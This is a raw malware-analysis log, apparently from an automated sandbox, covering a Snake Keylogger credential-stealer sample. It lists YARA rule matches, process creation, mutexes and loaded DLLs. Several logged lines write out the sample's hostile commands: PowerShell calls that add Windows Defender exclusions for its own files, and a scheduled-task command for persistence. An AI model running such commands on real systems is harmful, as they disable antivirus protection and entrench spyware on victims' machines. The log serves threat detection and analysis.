              Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: rPO0977-6745.exe PID: 1540, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: rPO0977-6745.exe PID: 1540, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: rPO0977-6745.exe PID: 2916, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: rPO0977-6745.exe PID: 2916, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: EDyxAgkldisLe.exe PID: 7276, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: EDyxAgkldisLe.exe PID: 7276, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: rPO0977-6745.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: EDyxAgkldisLe.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, k-.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, k-.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, k-.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, k-.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, k-.csBase64 encoded string: 'OqHzioSHceQ5qotdqa7Ykbba4f6uJp4tWTCMtVxXkiuCL74BelCp1pditD457DF8'
              Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, k-.csBase64 encoded string: 'OqHzioSHceQ5qotdqa7Ykbba4f6uJp4tWTCMtVxXkiuCL74BelCp1pditD457DF8'
              Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, u5QKsh8eHYOmOLmsMj.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, u5QKsh8eHYOmOLmsMj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, u5QKsh8eHYOmOLmsMj.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, t2qt23C1ZO7pYQfAKA.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, u5QKsh8eHYOmOLmsMj.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, u5QKsh8eHYOmOLmsMj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, u5QKsh8eHYOmOLmsMj.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, t2qt23C1ZO7pYQfAKA.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, u5QKsh8eHYOmOLmsMj.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, u5QKsh8eHYOmOLmsMj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, u5QKsh8eHYOmOLmsMj.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, t2qt23C1ZO7pYQfAKA.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/15@4/3
              Source: C:\Users\user\Desktop\rPO0977-6745.exeFile created: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeMutant created: NULL
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeMutant created: \Sessions\1\BaseNamedObjects\oXIdkGfpRvwWacgDRTNLtqu
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:516:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7936:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3644:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6880:120:WilError_03
              Source: C:\Users\user\Desktop\rPO0977-6745.exeFile created: C:\Users\user\AppData\Local\Temp\tmp44AD.tmpJump to behavior
              Source: rPO0977-6745.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: rPO0977-6745.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
              Source: C:\Users\user\Desktop\rPO0977-6745.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000317B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3697372033.0000000003FAF000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000316D000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000315D000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3696801560.0000000003821000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000029CC000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000029DC000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: rPO0977-6745.exeReversingLabs: Detection: 44%
              Source: C:\Users\user\Desktop\rPO0977-6745.exeFile read: C:\Users\user\Desktop\rPO0977-6745.exe:Zone.IdentifierJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\rPO0977-6745.exe "C:\Users\user\Desktop\rPO0977-6745.exe"
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp44AD.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess created: C:\Users\user\Desktop\rPO0977-6745.exe "C:\Users\user\Desktop\rPO0977-6745.exe"
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess created: C:\Users\user\Desktop\rPO0977-6745.exe "C:\Users\user\Desktop\rPO0977-6745.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp547C.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess created: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe"
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe"Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe"Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp44AD.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess created: C:\Users\user\Desktop\rPO0977-6745.exe "C:\Users\user\Desktop\rPO0977-6745.exe"Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess created: C:\Users\user\Desktop\rPO0977-6745.exe "C:\Users\user\Desktop\rPO0977-6745.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp547C.tmp"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess created: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe"Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
